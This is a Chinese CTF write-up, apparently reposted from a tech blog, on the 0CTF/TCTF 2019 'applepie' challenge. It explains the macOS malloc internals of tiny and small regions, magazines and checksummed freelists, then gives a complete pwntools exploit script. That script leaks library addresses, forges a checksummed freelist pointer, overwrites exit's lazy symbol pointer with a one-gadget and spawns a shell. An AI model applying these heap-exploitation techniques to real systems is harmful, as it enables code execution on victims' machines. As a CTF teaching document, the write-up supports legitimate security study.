内容简介:0CTF / TCTF2019比赛时出了一道MacOS下的堆利用题目,这里以该题为背景介绍下MacOS下的堆利用攻击。前面主要详细介绍下MacOS系统的堆,如果想看利用可跳到后面的MacOS高版本系统使用Magazine Allocator进行堆分配,低版本使用Scalable Allocator,详细结构这里不做介绍,它在分配时按照申请大小将堆分为三类
0CTF / TCTF2019比赛时出了一道MacOS下的堆利用题目,这里以该题为背景介绍下MacOS下的堆利用攻击。前面主要详细介绍下MacOS系统的堆,如果想看利用可跳到后面的 applepie exp编写
MacOS高版本系统使用Magazine Allocator进行堆分配,低版本使用Scalable Allocator,详细结构这里不做介绍,它在分配时按照申请大小将堆分为三类 tiny , small , large
其中tiny&small用一个叫做 Quantum ( Q ) 的单位管理
- tiny (Q = 16) ( tiny < 1009B )
- small (Q = 512) ( 1008B < small < 127KB )
- large ( 127KB < large )
MacOS的堆分配方式和其他系统不同,没有采用 Linked List
每个进程包含3个区域,分别为 tiny rack , small rack , large allocations
tiny rack | small rack | large allocations |
magazine | magazine | |
magazine | magazine | |
magazine | magazine | |
… | … | |
magazine | magazine |
这个叫”Region”的区域大小在tiny rack和small rack中是不同的,
“Region” in Tiny rack = 1MB
“Region” in Small rack = 8MB
tiny rack{ magazine 1 { Region 1 {} Region 2 {} ... Region n {} } magazine 2 {} ... magazine 3 {} } small rack{ ... magazine n {} ... }
“Region”中包含三样东西,一个是以 Q 为单位的内存block, 还有个是负责将各个”Region”关联起来的 trailer 另外一个就是记录chunk信息的 metadata
tiny Region { Q(1Q = 16) * 64520个 region_trailer_t trailer metadata[64520/sizeof(uint32_t)] { bitmaps[0]: uint32_t header = 描述哪个block是起始chunk bitmaps[1]: uint32_t inuse = 描述chunk状态(busy/free) } } Small Region { Q(1Q = 512) * 16320个 region_trailer_t trailer metadata[16320] { bitmaps[0]: uint16_t msize = 最高一位描述chunk状态(busy/free), 其余位描述chunk的Q值(Q值代表与下一个chunk相差多少个Q) } }
large allocations保存在cache中,直接记录地址和大小,除非是分割严重,否则一般不会被unmmap
large { address size did_madvise_reusable }
堆的释放 – chunk本身的变化
tiny堆在释放时,将该chunk挂在freelist上,这里和 Linux 类似
比较有意思的一点是,tiny堆在释放时,会在chunk上 写入元数据 ,我们值得关心的就是这一点
# ----------------------------------------------- # AAAAA.... # # ...AAA... # .....AAAA # ----------------------------------------------- # | # | after free # | # ↓ # ----------------------------------------------- # checksum(prev_pointer) | checksum(next_pointer) # size | ... # ... # | size # -----------------------------------------------
但是 这里如果按照Linux的方式去攻击堆时,就会发现这里的checksum会阻止堆的元数据被溢出修改。 后面会大致介绍这里的checksum
a1 = malloc(496) a2 = malloc(496) a3 = malloc(496) free(a1) free(a3) #这里会发现a1, a3会的prev_pointer & next_pointer会正确的关联起来 free(a2) #当a2也free之后,会发现a2, a3的头部被清空,a1头部的size却是三者之和,并且移动到small堆中
堆的释放 – chunk元数据(metadata)的变化
这里便是要讲上文提到的freelist, mag_free_list
是个负责存放地址的列表,一共包含32个元素,各个元素处储存着已经free的对应 Q 值的chunk地址,前31个分别是从1Q~31Q的chunk freelist,第32个存放比31Q还要大的chunk freelist。
当新的chunk被free时,将按照chunk的大小,存放在对应Q值的freelist上,并按照双向链表设置好checksum(prev_pointer), checksum(next_pointer) {参照Linux的freelist}
堆的释放 – checksum
程序在运行时,都会随机生成一个cookie,这个cookie会pointer进行下面的计算生成一个checksum, 然后将(checksum << 56 ) | (pointer >> 4)运算后将checksum保存在高位上,以便检测堆的元数据是否被溢出破坏
static MALLOC_INLINE uintptr_t free_list_checksum_ptr(rack_t *rack, void *ptr) { uintptr_t p = (uintptr_t)ptr; return (p >> NYBBLE) | ((free_list_gen_checksum(p ^ rack->cookie) & (uintptr_t)0xF) << ANTI_NYBBLE); // compiles to rotate instruction } static MALLOC_INLINE void * free_list_unchecksum_ptr(rack_t *rack, inplace_union *ptr) { inplace_union p; uintptr_t t = ptr->u; t = (t << NYBBLE) | (t >> ANTI_NYBBLE); // compiles to rotate instruction p.u = t & ~(uintptr_t)0xF; if ((t ^ free_list_gen_checksum(p.u ^ rack->cookie)) & (uintptr_t)0xF) { free_list_checksum_botch(rack, ptr, (void *)ptr->u); __builtin_trap(); } return p.p; } static MALLOC_INLINE uintptr_t free_list_gen_checksum(uintptr_t ptr) { uint8_t chk; chk = (unsigned char)(ptr >> 0); chk += (unsigned char)(ptr >> 8); chk += (unsigned char)(ptr >> 16); chk += (unsigned char)(ptr >> 24); #if __LP64__ chk += (unsigned char)(ptr >> 32); chk += (unsigned char)(ptr >> 40); chk += (unsigned char)(ptr >> 48); chk += (unsigned char)(ptr >> 56); #endif return chk; }
这个则包含了上述介绍过的各种数据,比如chunk cache, 以及mag_free_bit_map, mag_free_list, 以及最后一个被使用的region, 以及所有region的链表
struct magazine_t { ... void *mag_last_free; unsigned[8] mag_bitmap; free_list_t*[256] mag_free_list; region_t mag_last_region; region_trailer_t *firstNode, *lastNode; ... }
struct mem { int StyleTableIndex int ShapeTableIndex int Time int NameSize char *NameMem }
- 溢出
- leak
因为有PIE的存在,程序每次运行堆栈地址都会随机,所以整个利用思路就是先leak libsystem_c.dylib的地址,接着利用heap操作产生的漏洞去将包含的execv(‘/bin/sh’)代码运行地址写入可以劫持到程序流程的地方。
利用MacOS堆的特性leak libsystem_c.dylib
查看程序运行时的vmmap,可以看到程序下方有个Malloc metadata的region,这里开头存放的就是DefaultZone
typedef struct _malloc_zone_t { /* Only zone implementors should depend on the layout of this structure; Regular callers should use the access functions below */ void *reserved1; /* RESERVED FOR CFAllocator DO NOT USE */ void *reserved2; /* RESERVED FOR CFAllocator DO NOT USE */ size_t (* MALLOC_ZONE_FN_PTR(size))(struct _malloc_zone_t *zone, const void *ptr); /* returns the size of a block or 0 if not in this zone; must be fast, especially for negative answers */ void *(* MALLOC_ZONE_FN_PTR(malloc))(struct _malloc_zone_t *zone, size_t size); void *(* MALLOC_ZONE_FN_PTR(calloc))(struct _malloc_zone_t *zone, size_t num_items, size_t size); /* same as malloc, but block returned is set to zero */ void *(* MALLOC_ZONE_FN_PTR(valloc))(struct _malloc_zone_t *zone, size_t size); /* same as malloc, but block returned is set to zero and is guaranteed to be page aligned */ void (* MALLOC_ZONE_FN_PTR(free))(struct _malloc_zone_t *zone, void *ptr); void *(* MALLOC_ZONE_FN_PTR(realloc))(struct _malloc_zone_t *zone, void *ptr, size_t size); void (* MALLOC_ZONE_FN_PTR(destroy))(struct _malloc_zone_t *zone); /* zone is destroyed and all memory reclaimed */ const char *zone_name; /* Optional batch callbacks; these may be NULL */ unsigned (* MALLOC_ZONE_FN_PTR(batch_malloc))(struct _malloc_zone_t *zone, size_t size, void **results, unsigned num_requested); /* given a size, returns pointers capable of holding that size; returns the number of pointers allocated (maybe 0 or less than num_requested) */ void (* MALLOC_ZONE_FN_PTR(batch_free))(struct _malloc_zone_t *zone, void **to_be_freed, unsigned num_to_be_freed); /* frees all the pointers in to_be_freed; note that to_be_freed may be overwritten during the process */ struct malloc_introspection_t * MALLOC_INTROSPECT_TBL_PTR(introspect); unsigned version; /* aligned memory allocation. The callback may be NULL. Present in version >= 5. */ void *(* MALLOC_ZONE_FN_PTR(memalign))(struct _malloc_zone_t *zone, size_t alignment, size_t size); /* free a pointer known to be in zone and known to have the given size. The callback may be NULL. Present in version >= 6.*/ void (* MALLOC_ZONE_FN_PTR(free_definite_size))(struct _malloc_zone_t *zone, void *ptr, size_t size); /* Empty out caches in the face of memory pressure. The callback may be NULL. Present in version >= 8. */ size_t (* MALLOC_ZONE_FN_PTR(pressure_relief))(struct _malloc_zone_t *zone, size_t goal); /* * Checks whether an address might belong to the zone. May be NULL. Present in version >= 10. * False positives are allowed (e.g. the pointer was freed, or it's in zone space that has * not yet been allocated. False negatives are not allowed. */ boolean_t (* MALLOC_ZONE_FN_PTR(claimed_address))(struct _malloc_zone_t *zone, void *ptr); } malloc_zone_t;
struct malloc_introspection_t * MALLOC_INTROSPECT_TBL_PTR(introspect);
typedef struct malloc_introspection_t { kern_return_t (* MALLOC_INTROSPECT_FN_PTR(enumerator))(task_t task, void *, unsigned type_mask, vm_address_t zone_address, memory_reader_t reader, vm_range_recorder_t recorder); /* enumerates all the malloc pointers in use */ size_t (* MALLOC_INTROSPECT_FN_PTR(good_size))(malloc_zone_t *zone, size_t size); ... }
所以DefaultZone->introspect->enumerator这里储存了enumerator对应的函数 szone_ptr_in_use_enumerator
libsystem_malloc.dylib的地址 = leak出的 szone_ptr_in_use_enumerator地址 - sznoe偏移量(0x0000000000013D68)
libsystem_c.dylib = libsystem_malloc.dylib - 偏移量(0x161000)
OneGadget RCE
分析了libsystem_c.dylib,发现了与Linux libc中同样的execv(‘/bin/sh’)代码片段
onegadget rce = libsystem_c.dylib + 0x0000000000025D94
劫持程序流 – 前置
这里利用MachO的Lazy Bind机制,复写libsystem_c.dylib的la_symbol_ptr表中的函数存放地址(不写原程序的原因是无法leak原程序加载地址)
这里发现libsystem_c.dylib的TEXT和DATA region地址相差较大,不像原程序紧挨在一起,所以这里还需要再leak一次libsystem_c.dylibd的DATA region地址。
libsystem_c.dylib DATA
分析原程序时发现在 .got
内有个 FILE **__stdinp_ptr
可以看到开头的_p指向了某块内存的地址,这样就可以利用这个来完成leak DATA地址,这里buffer与DATA起始地址的偏移量分析下就可以得到
libsystem_c_DATA = libsystem_c_stdinptr - 0x4110
typedef struct __sFILE { unsigned char *_p; /* current position in (some) buffer */ int _r; /* read space left for getc() */ int _w; /* write space left for putc() */ short _flags; /* flags, below; this FILE is free if 0 */ short _file; /* fileno, if Unix descriptor, else -1 */ struct __sbuf _bf; /* the buffer (at least 1 byte, if !NULL) */ int _lbfsize; /* 0 or -_bf._size, for inline putc */ /* operations */ void *_cookie; /* cookie passed to io functions */ int (*_close)(void *); int (*_read) (void *, char *, int); fpos_t (*_seek) (void *, fpos_t, int); int (*_write)(void *, const char *, int); /* separate buffer for long sequences of ungetc() */ struct __sbuf _ub; /* ungetc buffer */ struct __sFILEX *_extra; /* additions to FILE to not break ABI */ int _ur; /* saved _r when _r is counting ungetc data */ /* tricks to meet minimum requirements even when malloc() fails */ unsigned char _ubuf[3]; /* guarantee an ungetc() buffer */ unsigned char _nbuf[1]; /* guarantee a getc() buffer */ /* separate buffer for fgetln() when line crosses buffer boundary */ struct __sbuf _lb; /* buffer for fgetln() */ /* Unix stdio files get aligned to block boundaries on fseek() */ int _blksize; /* stat.st_blksize (may be != _bf._size) */ fpos_t _offset; /* current lseek offset (see WARNING) */ } FILE;
劫持程序流 – 核心
根据前面堆的申请介绍,我们可以构造一些tiny堆,让再次申请堆时保证从freelist上获取,然后完成tiny_malloc_from_free_list(),使内部的unlink操作完成 next->previous = ptr->previous
next = free_list_unchecksum_ptr(rack, &ptr->next);
free_list_gen_checksum(uintptr_t ptr) { uint8_t chk; chk = (unsigned char)(ptr >> 0); chk += (unsigned char)(ptr >> 8); chk += (unsigned char)(ptr >> 16); chk += (unsigned char)(ptr >> 24); #if __LP64__ chk += (unsigned char)(ptr >> 32); chk += (unsigned char)(ptr >> 40); chk += (unsigned char)(ptr >> 48); chk += (unsigned char)(ptr >> 56); #endif return chk; } static MALLOC_INLINE uintptr_t free_list_checksum_ptr(rack_t *rack, void *ptr) { uintptr_t p = (uintptr_t)ptr; return (p >> NYBBLE) | ((free_list_gen_checksum(p ^ rack->cookie) & (uintptr_t)0xF) << ANTI_NYBBLE); // compiles to rotate instruction }
value = p64(((libsystem_c_exit_la_symbol_ptr >> 4) | int(checksum, 16)))
#!/usr/bin/python2.7 # -*- coding: utf-8 -*- from pwn import * #import monkeyhex from binascii import * import socket import sys def main(checksum, localFlag): if localFlag == 1: p = process('./applepie') elif localFlag == 2: p = remote('', 10007) elif localFlag == 3: p = remote('', 6666) # context.log_level = 'debug' context.terminal = ['tmux', 'split', '-h'] def add(style,shape,size,name): p.recvuntil('Choice: ') p.sendline('1') p.recvuntil(':') p.sendline(str(style)) p.recvuntil(':') p.sendline(str(shape)) p.recvuntil(':') p.sendline(str(size)) p.recvuntil(':') p.sendline(name) def show(id): p.recvuntil('Choice:' ) p.sendline('2') p.recvuntil(':') p.sendline(str(id)) def update(id,style,shape,size,name): p.recvuntil('Choice: ') p.sendline('3') p.recvuntil(':') p.sendline(str(id)) p.recvuntil(':') p.sendline(str(style)) p.recvuntil(':') p.sendline(str(shape)) p.recvuntil('Size: ') p.sendline(str(size)) p.recvuntil(':') p.sendline(name) def free(id): p.recvuntil('Choice:') p.sendline('4') p.recvuntil(':') p.sendline(str(id)) id0 = add(1, 1, 0x40, 'aaa') id1 = add(1, 1, 0x40, 'aaa') # 溢出修改styleTable数组的index,完成leak Default Zone struct的introspect保存的enumerator,可以用来leak libsystem_malloc.dylib # libsystem_malloc.dylib`szone_ptr_in_use_enumerator: # 0x7fff68161d68 <+0>: push rbp # 0x7fff68161d69 <+1>: mov rbp, rsp update(0, 1, 1, 0x50, 'a'*0x40 + p64(0x3fc0/8)) show(1) p.recvuntil('Style: ') szone_ptr_in_use_enumerator = u64(p.recvuntil('n')[:-1].ljust(8, 'x00')) log.info_once('szone_ptr_in_use_enumerator = ' + hex(szone_ptr_in_use_enumerator)) # szone_ptr_in_use_enumerator函数在libsystem_malloc.dylib中的地址0x0000000000013D68 libsystem_malloc_baseImage = szone_ptr_in_use_enumerator - 0x0000000000013D68 # Mac PIE的特殊性,程序本身每次运行全随机化,但动态库只有在开机时才会随机一次,此后位置都为固定 libsystem_c_baseImage = libsystem_malloc_baseImage - 0x161000 onegadget_rce = libsystem_c_baseImage + 0x0000000000025D94 # libsystem_c_exit_la_symbol_ptr = libsystem_c_baseImage + 0x8a0b0 log.info_once('libsystem_malloc.dylib = ' + hex(libsystem_malloc_baseImage)) log.info_once('libsystem_c.dylib = ' + hex(libsystem_c_baseImage)) log.info_once('libsystem_c.dylib: onegadget rce = ' + hex(onegadget_rce)) # log.info('libsystem_c.dylib: exit->la_symbol_ptr = ' + hex(libsystem_c_exit_la_symbol_ptr)) # 发现libsyste_c.dylib等动态库DATA与TEXT段分离较远(vmmap),所以先leak libsystem_c.dylib的DATA段 update(0, 1, 1, 0x50, 'a'*0x40 + p64(0xffffffffffffff78/8)) show(1) p.recvuntil('Style: ') libsystem_c_stdinptr = u64(p.recvuntil('n')[:-1].ljust(8, 'x00')) log.info_once('FILE *stdinp->p: ' + hex(libsystem_c_stdinptr)) libsystem_c_DATA = libsystem_c_stdinptr - 0x4110 log.info_once('libsystem_c.dylib: DATA seg = ' + hex(libsystem_c_DATA)) libsystem_c_exit_la_symbol_ptr = libsystem_c_DATA + 0xb0 log.info_once('libsystem_c.dylib: exit->la_symbol_ptr = ' + hex(libsystem_c_exit_la_symbol_ptr)) # 接着步骤为 id2 = add(1, 1, 0x40, 'aaa') id3 = add(1, 1, 0x40, 'aaa') # free id4 = add(1, 1, 0x40, 'aaa') # -----> 更改这个堆,溢出修改到下一个free块id5 id5 = add(1, 1, 0x40, 'aaa') # free id6 = add(1, 1, 0x40, 'aaa') id7 = add(1, 1, 0x40, 'aaa') # free id8 = add(1, 1, 0x40, 'aaa') # 释放id3,将其挂在freelist上 free(3) free(5) free(7) # 更新块id2时,溢出修改前面释放的id3块上的元数据头 # ----------------------------- # prev_pointer | next_pointer # size | ... # ... # | size # ----------------------------- # # 然后下次malloc时,会从freelist上获取之前free的id3 value = p64(((libsystem_c_exit_la_symbol_ptr >> 4) | int(checksum, 16))) log.info_once('after checksum(ptr): ' + hex(u64(value))) id7 = add(1, 1, 0x40, 'aaa') update(4, 1, 1, 0x50, 'a'*0x40 + p64(onegadget_rce) + value) # malloc申请内存,完成unlink操作, 将onegadget_rce写入libsystem_c_exit_la_symbol_ptr p.recvuntil('Choice: ') p.recvuntil('Choice: ') p.sendline('1') # add try: res = p.recv() # recvice 'Error' if res.find('malloc') > 0: log.failure('error checksum: ' + res) return else: log.success('!!! currect checksum(' + hex(libsystem_c_exit_la_symbol_ptr) + '): ' + hex(u64(value))) p.sendline('1') # Style p.recvuntil('Choice: ') p.sendline('1') # Shape p.recvuntil('Size: ') p.sendline('9999') # 输入错误Size让程序去执行exit()流程 p.recv() # 'Error' p.sendline('uname') res = p.recvuntil('Darwin') log.info(res) except: return p.interactive() # 这里getshell后就可以退出了 if res.find('Darwin') >= 0: sys.exit() for i in range(0x00, 0x23): checksum = '0x'+'{:016x}'.format(0x23<<56) main(checksum, 1)
以上就是本文的全部内容,希望对大家的学习有所帮助,也希望大家多多支持 码农网
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